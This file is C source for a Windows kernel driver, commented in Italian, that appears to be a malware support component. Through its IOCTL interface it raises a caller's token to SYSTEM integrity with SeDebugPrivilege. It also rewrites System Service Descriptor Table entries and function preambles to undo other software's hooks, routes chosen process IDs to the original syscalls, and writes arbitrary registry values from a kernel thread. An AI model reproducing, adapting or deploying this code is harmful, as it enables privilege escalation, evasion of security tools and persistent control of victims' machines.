#include "ntddk.h"
#include "enumproc.h"


#define PREAMBLE_SIZE 10
#pragma pack(1)
	typedef unsigned int DWORD;
	typedef unsigned char BYTE;
	typedef DWORD (NTAPI *PsGetCurrentProcessId_t)(void);

	typedef struct registry_entry {
		DWORD is_deleting;
		WCHAR key_name[256];
		WCHAR value_name[50];
		WCHAR value[1024];
	} REE;
	
	typedef struct fixup_entry {
		PVOID func_addr;
		unsigned char func_preamble[PREAMBLE_SIZE];
	} fu_entry;

	typedef struct SDEntry {
		unsigned int *Base;
		unsigned int *dummy;
		unsigned int num;
		unsigned char *ptable;
	} SSDT_Entry;
	
	typedef struct UnHookEntry {
		unsigned int index;
		fu_entry fix_up;
	} UHE;
	
	typedef struct AddPidEntry {
		DWORD PID;
		DWORD is_add;
	} APE;
	
	typedef struct SidEntry {
		DWORD *SID;
		DWORD Attributes;
	} SIE;
	
	typedef struct HookedSDTEntry {
		PVOID orig_func;
		PVOID effective_func;
	} HSE;
	
	typedef struct Jumper_Params {
		HSE *global_func_array;
		DWORD *global_pid_array;
		DWORD sys_call_count;
		PsGetCurrentProcessId_t pPsGetCurrentProcessId;
	} JPE;
#pragma pack()

#define HOOK_SIZE 512
#define MAX_PID 1000
#define MAGIC 0x30090000
#define FILE_DEVICE_UNHOOK 0x00008234
#define ADMIN_FUNCTION 	0x0882
#define UNHOOK_FUNCTION 0x0883
#define ADDPID_FUNCTION 0x0884
#define REG_FUNCTION	0x0885

#define IOCTL_UNHOOK CTL_CODE(FILE_DEVICE_UNHOOK, UNHOOK_FUNCTION, METHOD_BUFFERED, FILE_WRITE_ACCESS) // 0x8234A20C
#define IOCTL_ADDPID CTL_CODE(FILE_DEVICE_UNHOOK, ADDPID_FUNCTION, METHOD_BUFFERED, FILE_WRITE_ACCESS)    // 0x8234A210
#define IOCTL_ADMIN  CTL_CODE(FILE_DEVICE_UNHOOK, ADMIN_FUNCTION, METHOD_BUFFERED, FILE_WRITE_ACCESS)    // 0x8234A208
#define IOCTL_REG 	 CTL_CODE(FILE_DEVICE_UNHOOK, REG_FUNCTION, METHOD_BUFFERED, FILE_WRITE_ACCESS)    // 0x8234A214

#define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xC0000004L)
#define SystemProcessesAndThreadsInformation 5 

DWORD g_semaphore;
WCHAR g_key_name[256];
WCHAR g_value_name[50];
WCHAR g_value[1024];
DWORD g_is_deleting;

PVOID *g_mapped_sys_table = NULL;	// Puntatore alla sys call tables scrivibile
PDEVICE_OBJECT g_unhook_device;	// Puntatore al device 
JPE *jumper_entry = NULL;	// Struttura dati per l'hook
char *jumper_hook_addr = NULL;	// Puntatore alla funzione hook
const WCHAR dev_name[] = L"\\Device\\MSH4DEV1";
const WCHAR dev_link[] = L"\\DosDevices\\MSH4DEV1";

__declspec(dllimport) SSDT_Entry KeServiceDescriptorTable;

NTSTATUS Jumper_Function()
{
	PVOID ret_address;
	JPE *pData;
	DWORD curr_pid;
	DWORD i;
	DWORD sys_call_index;
	
	__asm {
		MOV [sys_call_index], EAX
	 	PUSHA
		MOV EBX, 0x69696969
		MOV [pData], EBX
	}
	
	/*if (sys_call_index >= pData->sys_call_count){
		__asm POPA
		__asm MOV EAX, 0x80000000 // XXX Metto un errore
		__asm leave
		__asm ret // XXX RETN ???
	}*/

	ret_address = pData->global_func_array[sys_call_index].effective_func;
	curr_pid = pData->pPsGetCurrentProcessId();
	for (i=0; i<MAX_PID; i++) 
		if (pData->global_pid_array[i] == curr_pid) {
			ret_address = pData->global_func_array[sys_call_index].orig_func;
			break;
		}
			
	__asm {
		POPA
		LEA ESP, [ret_address]
		//MOV EBP, [EBP]
		_emit 0x8B
		_emit 0x6D
		_emit 0x00
		RETN 0x4
	}
	
	// not reached
	return 0;
}

void* MemCopy(void *destaddr, void const *srcaddr, size_t len) {
	char *dest = destaddr;
	char const *src = srcaddr;

	while (len-- > 0)
	*dest++ = *src++;
	return destaddr;
}


void FreePIDList(DWORD *PID)
{
	ULONG cbBuffer = 0x8000;
	VOID *pBuffer = NULL; 
	NTSTATUS Status;
	DWORD i=0;
	PSYSTEM_PROCESS_INFORMATION pInfo;
	DWORD pid_found;
	
	do {
		pBuffer = ExAllocatePoolWithTag (NonPagedPool, cbBuffer, 'agan'); 
		if (pBuffer == NULL) 
			return;

		Status = ZwQuerySystemInformation(SystemProcessesAndThreadsInformation, pBuffer, cbBuffer, NULL);
		if (Status == STATUS_INFO_LENGTH_MISMATCH) {
			ExFreePoolWithTag(pBuffer, 'agan'); 
			cbBuffer *= 2; 
		} else if (!NT_SUCCESS(Status)) {
			ExFreePoolWithTag(pBuffer, 'agan'); 
			return; 
		}
	} while (Status == STATUS_INFO_LENGTH_MISMATCH);

	// Cicla la lista dei PID e cancella quelli che non sono pi attivi
	for (i=0; i<MAX_PID; i++) {
		if (PID[i] == 0)
			continue;
			
		pInfo = (PSYSTEM_PROCESS_INFORMATION)pBuffer;
		pid_found = 0;
		
		for (;;) {
			if (pInfo->ProcessId == PID[i]) {
				pid_found = 1;
				break;
			}
			
			if (pInfo->NextEntryDelta == 0)
				break; 
				
			pInfo = (PSYSTEM_PROCESS_INFORMATION)(((PUCHAR)pInfo)+ pInfo->NextEntryDelta); 
		}
		
		if (!pid_found)
			PID[i] = 0;
	}
	ExFreePoolWithTag(pBuffer, 'agan');
	return;
}

DWORD fix_preamble(unsigned char *func_addr, unsigned char *func_preamble)
{
	PMDL func_mdl;
	unsigned char *safe_func_addr;
	DWORD i;
	
	if (func_preamble[0] == 0)
		return 1;
	
	if ( !(func_mdl = IoAllocateMdl(func_addr, PREAMBLE_SIZE, FALSE, TRUE, NULL)) )
		return  0;
	try {
		MmProbeAndLockPages(func_mdl, KernelMode, IoWriteAccess);
	} except(EXCEPTION_EXECUTE_HANDLER) {
		IoFreeMdl(func_mdl);
		return  0;
	}
	if ( !(safe_func_addr = MmGetSystemAddressForMdlSafe(func_mdl, HighPagePriority)) ) {
		MmUnlockPages(func_mdl);
		IoFreeMdl(func_mdl);
		return  0;
	}
	
	for (i=0; i<PREAMBLE_SIZE; i++)
		safe_func_addr[i] = func_preamble[i];
		
	MmUnlockPages(func_mdl);
	IoFreeMdl(func_mdl);
	return  1;
}


NTSTATUS ioctl_unhook(IN PDEVICE_OBJECT dev_obj, IN PIRP irp)
{
	PIO_STACK_LOCATION	irp_sp;
	ULONG		func_code;
	UHE			*unhook_struct;
	APE			*addpid_struct;
	REE			*registry_struct;
	PMDL 		pmdl_sys_call;
	DWORD		i, j;
	PVOID 		*temp_g_mapped_sys_table;
	PVOID 		temp_func_ptr;

	irp_sp = IoGetCurrentIrpStackLocation(irp);
	func_code = irp_sp->Parameters.DeviceIoControl.IoControlCode;

	if (func_code == IOCTL_REG && irp_sp->Parameters.DeviceIoControl.InputBufferLength >= sizeof(REE) ) {
		registry_struct = (REE *)irp->AssociatedIrp.SystemBuffer;
		
		g_is_deleting = registry_struct->is_deleting;
		MemCopy(g_key_name, registry_struct->key_name, sizeof(g_key_name));
		MemCopy(g_value_name, registry_struct->value_name, sizeof(g_value_name));
		MemCopy(g_value, registry_struct->value, sizeof(g_value));
			
		g_semaphore = 1;
	}
	
	// Controlla il codice e la grandezza del buffer di input
	if (func_code == IOCTL_ADMIN && irp_sp->Parameters.DeviceIoControl.InputBufferLength >= sizeof(BYTE *) ) {
		DWORD sid_count;
		DWORD *privilege;
		SIE *sid_array;
		BYTE *token;
		
		token = *((BYTE **)irp->AssociatedIrp.SystemBuffer);

		sid_count = *((DWORD *)(token + 0x78));
		sid_array = *((SIE **)(token + 0x90));
		privilege = (DWORD *)(token + 0x40);

		// Cicla la lista dei SID associati al token effettivo
		for (i=0; i<sid_count; i++) {
			// Cerca l'integrity SID con privilegi medi.  Altrimenti non fa nulla.
			if (sid_array[i].SID[0]==0x00000101 && sid_array[i].SID[1]==0x10000000 && sid_array[i].SID[2]>=0x00002000 && sid_array[i].SID[2]<0x00003000) {
				// Eleva l'integrity level a SYSTEM
				sid_array[i].SID[2]=0x00004000;
				
				// Setta SeDebugPrivilege
				*privilege |= 0x00100000;
				privilege+=2;
				*privilege |= 0x00100000;
				
				// Ownership al gruppo Administrator
				for (j=0; j<sid_count; j++)
					if (sid_array[j].Attributes & 0x00000010) 
						sid_array[j].Attributes = 0x0000000F;
				
				break;
			}
		}
	}
	
	if (func_code == IOCTL_UNHOOK && irp_sp->Parameters.DeviceIoControl.InputBufferLength >= sizeof(UHE) ) {
		unhook_struct = (UHE *)irp->AssociatedIrp.SystemBuffer;
		
		// mappa la sdt se non l'ha ancora fatto
		if (!g_mapped_sys_table) {
			do {	
				if ( !(pmdl_sys_call = MmCreateMdl(NULL, KeServiceDescriptorTable.Base, KeServiceDescriptorTable.num*4)) )
					break;
					
				MmBuildMdlForNonPagedPool(pmdl_sys_call);
				// Cambia i flags della mappatura
				pmdl_sys_call->MdlFlags = pmdl_sys_call->MdlFlags | MDL_MAPPED_TO_SYSTEM_VA;
				
				__try {
					MmProbeAndLockPages(pmdl_sys_call, KernelMode, IoWriteAccess|IoReadAccess); 
				} __except(EXCEPTION_EXECUTE_HANDLER) {
					break;
				}
				
				g_mapped_sys_table = MmGetMdlVirtualAddress(pmdl_sys_call);		
			} while(0);
		}
		
		// Check che la procedura di hooking si andata tutta a buon fine
		// e Controlla che la sys call sia fra quelle mappate
		// e Che ci sia bisogna di de-wrapparla
		if (g_mapped_sys_table && jumper_hook_addr && (unhook_struct->index < jumper_entry->sys_call_count) &&
		    g_mapped_sys_table[unhook_struct->index] != unhook_struct->fix_up.func_addr) {
			// Per evitare la concorrenza sulla chiamata
		    temp_func_ptr = g_mapped_sys_table[unhook_struct->index];
		    
		    if (temp_func_ptr != jumper_hook_addr) {
				// Valorizza la entry nella lista delle funzioni del jumper
		     	jumper_entry->global_func_array[unhook_struct->index].orig_func = unhook_struct->fix_up.func_addr;
		     	jumper_entry->global_func_array[unhook_struct->index].effective_func = temp_func_ptr;
		    }
			
			// Hook alla SDT
			g_mapped_sys_table[unhook_struct->index] = jumper_hook_addr;
		}
		// In ogni caso ricopia il preambolo della funzione per evitare l'inline hookig
		fix_preamble(unhook_struct->fix_up.func_addr, unhook_struct->fix_up.func_preamble);
	}

	if (func_code == IOCTL_ADDPID && irp_sp->Parameters.DeviceIoControl.InputBufferLength >= sizeof(APE) ) {
		addpid_struct = (APE *)irp->AssociatedIrp.SystemBuffer;
		
		if (jumper_entry && jumper_entry->global_pid_array) {
			// Aggiunge un PID all'hiding
			if (addpid_struct->is_add) {
				for (i=0; i<MAX_PID; i++) {
					if (jumper_entry->global_pid_array[i]==0) {
						jumper_entry->global_pid_array[i] = addpid_struct->PID;
						break;
					}
				}
				// Se non ha trovato spazio...
				if (i == MAX_PID) {
					FreePIDList(jumper_entry->global_pid_array);
					for (i=0; i<MAX_PID; i++) {
						if (jumper_entry->global_pid_array[i]==0) {
							jumper_entry->global_pid_array[i] = addpid_struct->PID;
							break;
						}
					}
				}
			} else {
				for (i=0; i<MAX_PID; i++) {
					if (jumper_entry->global_pid_array[i]==addpid_struct->PID) {
						jumper_entry->global_pid_array[i] = 0;
						break;
					}
				}
			}
		}
	}

	irp->IoStatus.Status = STATUS_SUCCESS;
	IoCompleteRequest(irp, IO_NO_INCREMENT);
	
	return STATUS_SUCCESS;
}


NTSTATUS dummy_handler(IN PDEVICE_OBJECT dev_obj, IN PIRP irp)
{
	return STATUS_SUCCESS;
}


void OnUnload(IN PDRIVER_OBJECT dobj)
{
	UNICODE_STRING	dev_link_unicode;
	DWORD i;

	// Ripristina la SDT
	for (i=0; i<jumper_entry->sys_call_count; i++)
		if (jumper_entry->global_func_array[i].effective_func)
			g_mapped_sys_table[i] = jumper_entry->global_func_array[i].effective_func;
	
	RtlInitUnicodeString(&dev_link_unicode, dev_link);
	
	//ExFreePoolWithTag(jumper_entry->global_pid_array, 'agal');
	//ExFreePoolWithTag(jumper_entry->global_func_array, 'agak');
	//ExFreePoolWithTag(jumper_entry, 'agam');
	
	// Cancella il link che avevamo creato
	IoDeleteSymbolicLink(&dev_link_unicode);
	IoDeleteDevice(g_unhook_device);
}

void WorkerThread (IN DWORD *semaphore)
{
	LARGE_INTEGER interval;
	interval.HighPart = -1;
	interval.LowPart = -1000000;
	
	for(;;) {
		KeDelayExecutionThread(UserMode, FALSE, &interval);

		if (*semaphore == 1) {
			if (g_is_deleting) 
				RtlDeleteRegistryValue(RTL_REGISTRY_ABSOLUTE, g_key_name, g_value_name);
			else 
				RtlWriteRegistryValue(RTL_REGISTRY_ABSOLUTE, g_key_name, g_value_name, REG_EXPAND_SZ, 
										g_value, (wcslen(g_value)+1)*sizeof(WCHAR));
			*semaphore = 0;
		}
	}
}

NTSTATUS de_standard(IN PDRIVER_OBJECT dobj)
{
	UNICODE_STRING	dev_name_unicode;
	UNICODE_STRING	dev_link_unicode;
	NTSTATUS nt_status;
	HANDLE WorkerThreadHandle;
	DWORD i;
	
	dobj->DriverUnload = OnUnload;
	
	// Registra il dispatch per la ioctl e le fake per le altre funzioni
	for(i=0; i<IRP_MJ_MAXIMUM_FUNCTION; i++)
		dobj->MajorFunction[i] = dummy_handler;
		
	// Setta il gestore di ioctl
	dobj->MajorFunction[IRP_MJ_DEVICE_CONTROL] = ioctl_unhook;

	// Crea il device di un-hooking
	RtlInitUnicodeString(&dev_name_unicode, dev_name);
	RtlInitUnicodeString(&dev_link_unicode, dev_link);

	nt_status = IoCreateDevice(dobj, 0, &dev_name_unicode, FILE_DEVICE_UNHOOK, 0, FALSE, &g_unhook_device);
	
	if ( NT_SUCCESS(nt_status) ) 
		nt_status = IoCreateSymbolicLink(&dev_link_unicode, &dev_name_unicode);
	else
		return nt_status;
		
	do {
		// Alloca la struttura dati per l'hook
		if ( !(jumper_entry = (JPE *)ExAllocatePoolWithTag(NonPagedPool, sizeof(JPE), 'agam')) )
			break;
				
		// Salva il numero di sys_call mappate
		jumper_entry->sys_call_count = KeServiceDescriptorTable.num;
	
		// Inizializza l'array delle funzioni				
		if ( !(jumper_entry->global_func_array = (HSE *)ExAllocatePoolWithTag(NonPagedPool, jumper_entry->sys_call_count * sizeof(HSE), 'agak')) )
			break;
			
		for(i=0; i<jumper_entry->sys_call_count; i++) {
			jumper_entry->global_func_array[i].effective_func = NULL;
			jumper_entry->global_func_array[i].orig_func = NULL;
		}

		// Inizializza l'array dei PID	
		if ( !(jumper_entry->global_pid_array = (DWORD *)ExAllocatePoolWithTag(NonPagedPool,  MAX_PID * sizeof(DWORD), 'agal')) )
			break;
			
		for (i=0; i<MAX_PID; i++)
			jumper_entry->global_pid_array[i] = 0;
			
		// Funzioni richiamate (solo per paranoia)
		jumper_entry->pPsGetCurrentProcessId = (PsGetCurrentProcessId_t)PsGetCurrentProcessId;
		
		// Copia l'hook nello heap
		if ( !(jumper_hook_addr = (char *)ExAllocatePool(NonPagedPool, HOOK_SIZE)) )
			break;
			
		for (i=0; i<HOOK_SIZE; i++)
			jumper_hook_addr[i] = ((char *)Jumper_Function)[i];	
			
		// Binary patch per l'indirizzo della struttura dati
		for (i=0; jumper_hook_addr[i]!=0x69; i++);
		
		*((DWORD *)(jumper_hook_addr + i)) = (DWORD)jumper_entry;		
	} while(0);

	// Thread per le scritture nel registry
	g_semaphore = 0;
	PsCreateSystemThread(&WorkerThreadHandle, THREAD_ALL_ACCESS, NULL, NULL, NULL, WorkerThread, &g_semaphore);

	return STATUS_SUCCESS;
}


// Cerca il modulo dove vogliamo far passare i parametri
DWORD FindExe(unsigned char *string)
{
	if (_stricmp(string, "ntdll.dll") == 0)
		return 1;
	return 0;
}

NTSTATUS de_forced(IN PDRIVER_OBJECT dobj)
{
	NTSTATUS rc;
	PMDL uspace_mdl;
	DWORD *kusp;
	DWORD *str_addr;
	DWORD pModules;
	PMODULES pModStruct;
	PSYSTEM_MODULE_INFORMATION psmi;
	DWORD image_base;
	fu_entry *old_sdt;
	DWORD entry_num;
	DWORD i, len;
	DWORD *mapped_sys_table;	

	// Prende la lista dei moduli
	pModules = (DWORD)&pModules;
	rc = ZwQuerySystemInformation(11, (PMODULES)pModules, 4, &len);
	if (rc == STATUS_INFO_LENGTH_MISMATCH) {
		pModules = (DWORD)ExAllocatePool(NonPagedPool, len);
    		if (!pModules)
    			return STATUS_UNSUCCESSFUL;
		rc = ZwQuerySystemInformation(11, (PMODULES)pModules, len, NULL);
		if (!NT_SUCCESS(rc)) {
			ExFreePool((PVOID)pModules);
			return STATUS_UNSUCCESSFUL;
		}
    } else
		return STATUS_UNSUCCESSFUL;

	// Prende la base di ntdll
	pModStruct = (PMODULES)pModules;
	psmi = &(pModStruct->smi);
	psmi++; 
	image_base = 0;
	// ...e di ntdll.dll
	for (i=1; i<pModStruct->dwNumberOfModules; i++, psmi++) 
		if (FindExe(psmi->ImageName + psmi->ModuleNameOffset))
			image_base = (DWORD)psmi->Base;	

	ExFreePool((PVOID)pModules);
	if (!image_base)
		return  STATUS_UNSUCCESSFUL;

	// Mappa l'header di ntdll	
	str_addr = (unsigned int *)(image_base + (7*4));
	if ( !(uspace_mdl = IoAllocateMdl(str_addr, 8,  FALSE, TRUE, NULL)) )
		return  STATUS_UNSUCCESSFUL;

	try {
		MmProbeAndLockPages(uspace_mdl, UserMode, IoReadAccess);
	} except(EXCEPTION_EXECUTE_HANDLER) {
		IoFreeMdl(uspace_mdl);
		return  STATUS_UNSUCCESSFUL;
	}
	if ( !(kusp = MmGetSystemAddressForMdlSafe(uspace_mdl, HighPagePriority)) ) {
		MmUnlockPages(uspace_mdl);
		IoFreeMdl(uspace_mdl);
		return  STATUS_UNSUCCESSFUL;
	}
	// Legge dall'header l'indirizzo della vecchia sdt
	// e il numero di entry
	old_sdt = (fu_entry *)(kusp[0]);
	entry_num = kusp[1];
	MmUnlockPages(uspace_mdl);
	IoFreeMdl(uspace_mdl);
	// Check di consistenza
	if ( (entry_num & 0xFFFF) > KeServiceDescriptorTable.num && (entry_num & 0xFFFF0000) != MAGIC) 
		return  STATUS_UNSUCCESSFUL;
	entry_num &= 0xFFFF;
	
	// Mappa la vecchia SDT in user space
	if ( !(uspace_mdl = IoAllocateMdl(old_sdt, entry_num*sizeof(fu_entry),  FALSE, TRUE, NULL)) )
		return  STATUS_UNSUCCESSFUL;
	try {
		MmProbeAndLockPages(uspace_mdl, UserMode, IoReadAccess);
	} except(EXCEPTION_EXECUTE_HANDLER) {
		IoFreeMdl(uspace_mdl);
		return  STATUS_UNSUCCESSFUL;
	}
	if ( !(old_sdt = MmGetSystemAddressForMdlSafe(uspace_mdl, HighPagePriority)) ) {
		MmUnlockPages(uspace_mdl);
		IoFreeMdl(uspace_mdl);
		return  STATUS_UNSUCCESSFUL;
	}

	// Sovrascrive le entry
	mapped_sys_table = KeServiceDescriptorTable.Base;
	for (i=0; i<entry_num; i++) {
		mapped_sys_table[i] = (DWORD)(old_sdt[i].func_addr);
		// Aggiusta il preambolo
		fix_preamble((unsigned char *)mapped_sys_table[i], old_sdt[i].func_preamble);
	}
	
	MmUnlockPages(uspace_mdl);
	IoFreeMdl(uspace_mdl);

	return STATUS_SUCCESS;
}


NTSTATUS DriverEntry( IN PDRIVER_OBJECT dobj, IN PUNICODE_STRING regpath)
{
	if (regpath)
		return de_standard(dobj);
	else
		return de_forced(dobj);
}